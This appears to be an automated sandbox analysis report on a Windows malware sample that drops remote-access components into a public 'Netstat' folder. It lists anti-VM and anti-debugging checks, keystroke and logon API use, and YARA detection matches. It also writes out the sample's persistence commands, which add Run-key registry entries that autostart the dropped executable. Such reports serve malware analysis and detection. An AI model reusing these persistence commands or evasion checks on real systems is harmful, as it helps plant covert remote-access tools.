                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.0.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: bild.exe, 00000006.00000003.2362346537.0000000005799000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899523312.0000000005799000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3898582655.0000000001135000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000003.2362426992.0000000001135000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: bild.exe, 0000000A.00000003.2324800216.0000000000810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: TCCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: bild.exe, 00000006.00000002.3898386960.000000000104E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                                Source: bild.exe, 00000007.00000003.2162083613.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000009.00000003.2243682980.000000000131F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeAPI call chain: ExitProcess graph end nodegraph_0-22642
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end nodegraph_6-94594
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end nodegraph_6-99512
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end nodegraph_6-95226
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DDA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003DDA75
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,6_2_11147750
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,6_2_11029590
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003E4A5A mov eax, dword ptr fs:[00000030h]0_2_003E4A5A
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003E8AAA GetProcessHeap,0_2_003E8AAA
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DDA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003DDA75
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003E5B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003E5B53
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DDBC3 SetUnhandledExceptionFilter,0_2_003DDBC3
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DDD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003DDD7C
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,6_2_11093080
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,6_2_110310C0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_11161D01
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1116DD89
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5F28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C5F28E1
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5F87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C5F87F5
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,7_2_11093080
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,7_2_110310C0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_11161D01
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_1116DD89
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,6_2_110F4560
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,6_2_1111FCA0
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exeJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,6_2_1109E190
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,6_2_1109E910
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: bild.exe, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Shell_TrayWnd
                                Source: bild.exe, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Progman
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DD8CB cpuid 0_2_003DD8CB
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_003D932F
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_11173A35
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_11173D69
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11173CC6
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoA,6_2_1116B38E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_11173933
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_111739DA
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_1117383E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11173D2D
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_11173C06
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_6C60DC56
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_6C601CC1
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoA,6_2_6C60DC99
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_6C601DB6
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_6C601E5D
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_6C601EB8
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,6_2_6C600F39
                                Source: C:\Users\Public\Netstat\bild.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,6_2_6C5FFAE1
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,6_2_6C60DB7C
                                Source: C:\Users\Public\Netstat\bild.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,6_2_6C601680
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_6C602089
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C602175
                                Source: C:\Users\Public\Netstat\bild.exeCode function: EnumSystemLocalesA,6_2_6C602151
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C6021DC
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,6_2_6C601257
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_6C602218
                                Source: C:\Users\Public\Netstat\bild.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_6C6002AD
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_11173D69
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoA,7_2_1116B38E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_11173933
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_111739DA
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_1117383E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_11173A35
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11173D2D
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_11173C06
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11173CC6
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,6_2_110F33F0
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DC131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_003DC131
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,6_2_1103B160
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,6_2_11174AE9
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003CA8E0 GetVersionExW,0_2_003CA8E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,6_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,6_2_110D8200
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5DA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,6_2_6C5DA980
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,7_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,7_2_110D8200
                                Source: Yara matchFile source: 10.2.bild.exe.6cee0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.0.bild.exe.a50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.a50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.a50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.6e350000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.bild.exe.6e350000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.bild.exe.a50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.bild.exe.6e350000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.6e350000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.bild.exe.a50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.bild.exe.a50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe.4fbb800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.6cee0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.6c5d0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.0.bild.exe.a50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.bild.exe.6cee0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.bild.exe.a50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.6cee0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000007.00000002.2163282550.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000000.2160770098.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2246542222.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.2325321884.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000000.2053735718.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.2241928402.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000000.2323620387.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe PID: 1100, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7216, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7388, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7612, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7688, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\bild.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED
